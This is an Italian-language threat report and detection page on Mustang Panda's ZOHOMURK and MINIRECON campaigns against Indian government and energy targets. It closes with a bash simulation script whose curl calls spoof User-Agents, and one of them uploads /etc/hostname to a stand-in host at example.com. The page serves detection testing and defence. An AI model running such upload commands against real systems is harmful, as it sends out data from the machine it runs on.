Mustang Panda utilizza ZOHOMURK e MINIRECON contro il governo e i settori energetici dell’India
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
Mustang Panda sta conducendo operazioni di spionaggio mirate al governo indiano e ai settori dell’energia idroelettrica. Il gruppo sta utilizzando un toolkit di malware aggiornato che include SHARDLOADER, MINIRECON e ZOHOMURK. Una delle tecniche notevoli è l’abuso di Zoho WorkDrive per il comando e controllo e l’esfiltrazione di dati.
Investigazione
Acronis TRU ha identificato due campagne parallele che utilizzavano esche di spear-phishing incentrate sulla cooperazione India-Taiwan. I ricercatori hanno trovato il caricamento laterale di DLL attraverso binari legittimi di Solid PDF Creator e hanno analizzato i nuovi impianti ZOHOMURK e MINIRECON. L’indagine è stata condotta anche in coordinamento con CERT-In per supportare azioni difensive.
Mitigazione
Le organizzazioni dovrebbero monitorare per attività insolite che coinvolgono piattaforme cloud, soprattutto l’uso non autorizzato di Zoho WorkDrive. Le soluzioni EDR e XDR dovrebbero essere regolate per rilevare il caricamento laterale di DLL e la persistenza sospetta basata su registro. È essenziale anche la visibilità nei processi non-browser che effettuano connessioni HTTPS o WebSocket ai servizi cloud.
Risposta
Se viene rilevata questa attività, i sistemi interessati devono essere isolati immediatamente per fermare ulteriori esfiltrazioni attraverso le API cloud. Gli investigatori dovrebbero eseguire analisi forensi sui percorsi di staging come C:ProgramDataIDMlogs or %LOCALAPPDATA%MicrosoftVaultCache. Le chiavi di esecuzione nel registro e i compiti programmati dovrebbero essere rivisti per persistenze non autorizzate.
Flusso di Attacco
Rilevamenti
Attività Sospetta di Attività Pianificata (tramite audit)
Visualizza
Punti di Possibile Persistenza [ASEPs – Software/Hive NTUSER] (tramite evento registro)
Visualizza
File Sospetti nel Profilo Utente Pubblico (tramite evento file)
Visualizza
Rilevamento delle Comunicazioni C2 di Mustang Panda MINIRECON e ZOHOMURK [Connessione di Rete Windows]
Visualizza
Rilevamento del Comando e Controllo di Mustang Panda ZOHOMURK [Proxy]
Visualizza
Rilevamento dei Meccanismi di Persistenza di Mustang Panda negli Attacchi al Settore Indiano [Evento nel Registro di Windows]
Visualizza
Esecuzione Simulazione
Prerequisito: Il Controllo Preliminare della Telematica e del Baseline deve essere superato.
Razionale: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente le TTP identificate e mirare a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.
-
Narrativa dell’Attacco e Comandi: L’avversario ha stabilito con successo un avamposto e sta tentando di iniziare comunicazioni di Comando e Controllo (C2). Per sembrare traffico aziendale legittimo, l’impianto ZOHOMURK tenta di comunicare con il suo controllore imitando le chiamate API di Zoho WorkDrive. L’attaccante utilizza una stringa di User-Agent specifica e hardcoded (
Zoho Client/1.0) per superare alcuni filtri di rete, sperando di mimetizzarsi con il traffico legittimo di produttività cloud. Questa azione genererà una voce di log proxy contenente l’User-Agent target, attivando così la regola di rilevamento. -
Script di Test di Regressione:
#!/bin/bash # Simulazione di C2 ZOHOMURK tramite spoofing User-Agent # Obiettivo 1: Imitazione di Zoho Client echo "[+] Simulazione ZOHOMURK: Zoho Client/1.0" curl -A "Zoho Client/1.0" http://example.com/api/v1/sync # Obiettivo 2: Imitazione di IPFetcher echo "[+] Simulazione ZOHOMURK: IPFetcher/1.0" curl -A "IPFetcher/1.0" http://example.com/checkip # Obiettivo 3: Imitazione di Multipart POST User-Agent echo "[+] Simulazione ZOHOMURK: Multipart POST" curl -X POST -A "Multipart POST" -F "data=@/etc/hostname" http://example.com/upload -
Comandi di Pulizia:
# Non vengono creati artefatti persistenti sul sistema da questa simulazione basata su rete. # Assicurarsi semplicemente che nessun processo curl in background sia in esecuzione. pkill curl